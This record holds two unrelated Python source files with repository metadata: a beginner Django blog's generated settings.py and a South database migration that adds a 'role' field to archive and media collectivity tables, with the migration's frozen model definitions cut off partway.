02dd977436f11939f930ff3f807955ba0b959b3d | c97be8b4d3b7622cfbaec735fcb945c140f6e358 | /mysite/settings.py | f1b9c25ac2a217fe889d1e3200fccc156d840eb8 | [] | no_license | Mulannn/my-first-blog | 9603adf2497c977531941afd9cdeb1d3cf109c8f | f7f3ca7f327c02832fb15e7045dfa3c2f3e9b3d6 | refs/heads/master | 2020-03-27T19:25:15.686643 | 2018-09-01T14:39:49 | 2018-09-01T14:39:49 | 146,987,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,193 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '2os&)6gtt9s*=-r3-(3hmg09xe!y17jegt*gceipezu=zua&$_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Budapest'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"[email protected]"
] | |
199702ad609cce49f16724e9aaa7caa86a4959f6 | e2b6ff88f4b57c815fa60516ec11c611617fad7f | /archives/migrations/0035_auto__add_field_mediacollectivity_role__add_field_archivecollectivity_.py | 32ec20fb54866fb8789338f5ec7fc72c70810fb1 | [] | no_license | funkyminh/archiprod | 7ed5507f5097e1d3db14fef7c45ebda2e6238579 | 89772ca8ef70960157fefefff5f3a893f91f3635 | refs/heads/master | 2016-08-05T04:58:05.836863 | 2015-04-22T15:03:48 | 2015-04-22T15:03:48 | 34,397,120 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,855 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'MediaCollectivity.role'
db.add_column('archives_media_collectivities', 'role',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['utils.Role'], null=True, blank=True),
keep_default=False)
# Adding field 'ArchiveCollectivity.role'
db.add_column('archives_archive_collectivities', 'role',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['utils.Role'], null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'MediaCollectivity.role'
db.delete_column('archives_media_collectivities', 'role_id')
# Deleting field 'ArchiveCollectivity.role'
db.delete_column('archives_archive_collectivities', 'role_id')
models = {
u'archives.archive': {
'Meta': {'object_name': 'Archive'},
'available': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'collectivities': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Collectivity']", 'null': 'True', 'through': u"orm['archives.ArchiveCollectivity']", 'blank': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_transfert': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['events.Event']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'id_archiprod': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'note2prog_id': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'old_id': ('django.db.models.fields.CharField', [], {'max_length': '384', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '12', 'null': 'True', 'blank': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Person']", 'null': 'True', 'through': u"orm['archives.ArchiveParticipant']", 'blank': 'True'}),
'pending': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'place': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Place']", 'null': 'True', 'blank': 'True'}),
'reviewer': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'reviewer'", 'null': 'True', 'to': u"orm['auth.User']"}),
'set': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Set']", 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '384', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['archives.Tag']", 'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'archives.archivecollectivity': {
'Meta': {'unique_together': "(('archive', 'collectivity'),)", 'object_name': 'ArchiveCollectivity', 'db_table': "'archives_archive_collectivities'"},
'archive': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Archive']"}),
'collectivity': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Collectivity']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Role']", 'null': 'True', 'blank': 'True'})
},
u'archives.archiveparticipant': {
'Meta': {'object_name': 'ArchiveParticipant'},
'archive': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Archive']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Person']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Role']"})
},
u'archives.audio': {
'Meta': {'object_name': 'Audio', 'db_table': "u'audio'"},
'abstract': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'acanthes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'annee': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'chemin_fichier': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_enregistrement': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'dateissued_portail': ('django.db.models.fields.TextField', [], {'db_column': "'dateIssued_portail'", 'blank': 'True'}),
'details_intranet_actuel_acda': ('django.db.models.fields.TextField', [], {'db_column': "'details_intranet_actuel_ACDA'", 'blank': 'True'}),
'duree': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'genre': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'horodatage_creation': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'horodatage_modification': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intervenants': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'intervenants_audio'", 'symmetrical': 'False', 'through': u"orm['archives.IntervenantAudio']", 'to': u"orm['archives.Intervenant']"}),
'kf_id_intervenant_principal': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Intervenant']", 'null': 'True', 'db_column': "'kf_ID_intervenant_principal'", 'blank': 'True'}),
'kf_id_langue_1': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'langue_1'", 'null': 'True', 'db_column': "'kf_ID_langue_1'", 'to': u"orm['archives.Langue']"}),
'kf_id_langue_2': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'langue_2'", 'null': 'True', 'db_column': "'kf_ID_langue_2'", 'to': u"orm['archives.Langue']"}),
'kf_id_langue_3': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'langue_3'", 'null': 'True', 'db_column': "'kf_ID_langue_3'", 'to': u"orm['archives.Langue']"}),
'kf_id_lieu': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Lieu']", 'null': 'True', 'db_column': "'kf_ID_lieu'", 'blank': 'True'}),
'kf_id_orchestre': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Orchestre']", 'null': 'True', 'db_column': "'kf_ID_orchestre'", 'blank': 'True'}),
'lien_test_web': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_abstract': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_accesscondition': ('django.db.models.fields.TextField', [], {'db_column': "'oai_accessCondition'", 'blank': 'True'}),
'oai_genre': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_id': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_language_languageterm_1': ('django.db.models.fields.TextField', [], {'db_column': "'oai_language_languageTerm_1'", 'blank': 'True'}),
'oai_language_languageterm_2': ('django.db.models.fields.TextField', [], {'db_column': "'oai_language_languageTerm_2'", 'blank': 'True'}),
'oai_language_languageterm_3': ('django.db.models.fields.TextField', [], {'db_column': "'oai_language_languageTerm_3'", 'blank': 'True'}),
'oai_location_physicallocation': ('django.db.models.fields.TextField', [], {'db_column': "'oai_location_physicalLocation'", 'blank': 'True'}),
'oai_location_url_full': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_location_url_preview': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_origininfo_datecaptured': ('django.db.models.fields.TextField', [], {'db_column': "'oai_originInfo_dateCaptured'", 'blank': 'True'}),
'oai_origininfo_place': ('django.db.models.fields.TextField', [], {'db_column': "'oai_originInfo_place'", 'blank': 'True'}),
'oai_origininfo_publisher': ('django.db.models.fields.TextField', [], {'db_column': "'oai_originInfo_publisher'", 'blank': 'True'}),
'oai_physicaldescription_digitalorigin': ('django.db.models.fields.TextField', [], {'db_column': "'oai_physicalDescription_digitalOrigin'", 'blank': 'True'}),
'oai_physicaldescription_form': ('django.db.models.fields.TextField', [], {'db_column': "'oai_physicalDescription_form'", 'blank': 'True'}),
'oai_physicaldescription_internetmediatype': ('django.db.models.fields.TextField', [], {'db_column': "'oai_physicalDescription_internetMediaType'", 'blank': 'True'}),
'oai_publication': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'oai_recordinfo_languageofcataloging_languageterm': ('django.db.models.fields.TextField', [], {'db_column': "'oai_recordInfo_languageOfCataloging_languageTerm'", 'blank': 'True'}),
'oai_recordinfo_recordchangedate': ('django.db.models.fields.TextField', [], {'db_column': "'oai_recordInfo_recordChangeDate'", 'blank': 'True'}),
'oai_recordinfo_recordcontentsource': ('django.db.models.fields.TextField', [], {'db_column': "'oai_recordInfo_recordContentSource'", 'blank': 'True'}),
'oai_recordinfo_recordcreationdate': ('django.db.models.fields.TextField', [], {'db_column': "'oai_recordInfo_recordCreationDate'", 'blank': 'True'}),
'oai_recordinfo_recordidentifier': ('django.db.models.fields.TextField', [], {'db_column': "'oai_recordInfo_recordIdentifier'", 'blank': 'True'}),
'oai_targetaudience': ('django.db.models.fields.TextField', [], {'db_column': "'oai_targetAudience'", 'blank': 'True'}),
'oai_titleinfo_title': ('django.db.models.fields.TextField', [], {'db_column': "'oai_titleInfo_title'", 'blank': 'True'}),
'oai_typeofresource': ('django.db.models.fields.TextField', [], {'db_column': "'oai_typeOfResource'", 'blank': 'True'}),
'oai_web_oai_mods': ('django.db.models.fields.TextField', [], {'db_column': "'oai_WEB_OAI_MODS'", 'blank': 'True'}),
'physicaldescription': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "'physicalDescription'", 'blank': 'True'}),
'remarque': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'subtitle': ('django.db.models.fields.TextField', [], {'db_column': "'subTitle'", 'blank': 'True'}),
'total_durees': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'type_document': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'type_ircam': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'typeofresource': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_column': "'typeOfResource'", 'blank': 'True'}),
'url_ecoute_extranet': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url_ecoute_internet': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url_ecoute_intranet': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url_ecoute_intranet_adresse': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'}),
'url_export_ircam': ('django.db.models.fields.TextField', [], {'db_column': "'url_export IRCAM'", 'blank': 'True'})
},
u'archives.contract': {
'Meta': {'object_name': 'Contract'},
'archive': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Archive']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nb_pages': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'archives.intervenant': {
'Meta': {'object_name': 'Intervenant', 'db_table': "u'intervenant'"},
'biographie': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'horodatage_creation': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'horodatage_modification': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nom': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "'Nom'", 'blank': 'True'}),
'prenom': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'Pr\\xe9nom'", 'blank': 'True'}),
'prenom_nom': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'web_1': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'web_2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
u'archives.intervenantaudio': {
'Meta': {'object_name': 'IntervenantAudio'},
'audio': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Audio']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intervenant': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Intervenant']"}),
'ordre': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'archives.langue': {
'Meta': {'object_name': 'Langue', 'db_table': "u'langue'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'languageterm': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "'languageTerm'", 'blank': 'True'})
},
u'archives.lieu': {
'Meta': {'object_name': 'Lieu', 'db_table': "u'lieu'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'placeterm': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'db_column': "'placeTerm'", 'blank': 'True'}),
'salle': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'blank': 'True'})
},
u'archives.media': {
'Meta': {'object_name': 'Media'},
'archive': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Archive']", 'null': 'True', 'blank': 'True'}),
'collectivities': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Collectivity']", 'null': 'True', 'through': u"orm['archives.MediaCollectivity']", 'blank': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'confidentiality': ('django.db.models.fields.CharField', [], {'default': "'0'", 'max_length': '1'}),
'duration': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'media': ('django.db.models.fields.CharField', [], {'max_length': '36', 'null': 'True', 'blank': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '192', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Person']", 'null': 'True', 'through': u"orm['archives.Participant']", 'blank': 'True'}),
'publisher': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'publisher'", 'null': 'True', 'to': u"orm['utils.Collectivity']"}),
'record_type': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'slideshow': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'thumbnail': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'work': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Work']", 'null': 'True', 'blank': 'True'})
},
u'archives.mediacollectivity': {
'Meta': {'unique_together': "(('media', 'collectivity'),)", 'object_name': 'MediaCollectivity', 'db_table': "'archives_media_collectivities'"},
'collectivity': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Collectivity']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'media': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Media']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Role']", 'null': 'True', 'blank': 'True'})
},
u'archives.orchestre': {
'Meta': {'object_name': 'Orchestre', 'db_table': "u'orchestre'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'musiciens': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'nom_chef': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'blank': 'True'}),
'nom_complet': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'db_column': "'nom complet'", 'blank': 'True'}),
'prenom_chef': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'blank': 'True'}),
'role_chef': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'blank': 'True'}),
'sous_titre': ('django.db.models.fields.TextField', [], {'db_column': "'sous titre'", 'blank': 'True'})
},
u'archives.participant': {
'Meta': {'object_name': 'Participant'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'media': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['archives.Media']"}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Person']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Role']"})
},
u'archives.set': {
'Meta': {'ordering': "['label']", 'object_name': 'Set'},
'comment': ('django.db.models.fields.CharField', [], {'max_length': '384', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'archives.shared': {
'Meta': {'object_name': 'Shared'},
'dailymotion': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'media': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['archives.Media']", 'unique': 'True'}),
'soundcloud': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'vimeo': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'youtube': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'archives.tag': {
'Meta': {'object_name': 'Tag'},
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'events.event': {
'Meta': {'ordering': "['tree_id', 'lft']", 'object_name': 'Event'},
'date_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'event_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['events.EventType']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['events.Event']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '384', 'null': 'True', 'blank': 'True'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
u'events.eventtype': {
'Meta': {'object_name': 'EventType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': u"orm['events.EventType']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
u'utils.collectivity': {
'Meta': {'ordering': "['name']", 'object_name': 'Collectivity'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'utils.composer': {
'Meta': {'object_name': 'Composer'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Person']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Role']"}),
'work': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['utils.Work']"})
},
u'utils.person': {
'Meta': {'ordering': "['last_name']", 'object_name': 'Person'},
'biography': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '150', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '150'})
},
u'utils.place': {
'Meta': {'object_name': 'Place'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '765'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '765'}),
'hall': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'utils.role': {
'Meta': {'object_name': 'Role'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'utils.work': {
'Meta': {'object_name': 'Work'},
'collectivities': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Collectivity']", 'null': 'True', 'blank': 'True'}),
'composers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['utils.Person']", 'null': 'True', 'through': u"orm['utils.Composer']", 'blank': 'True'}),
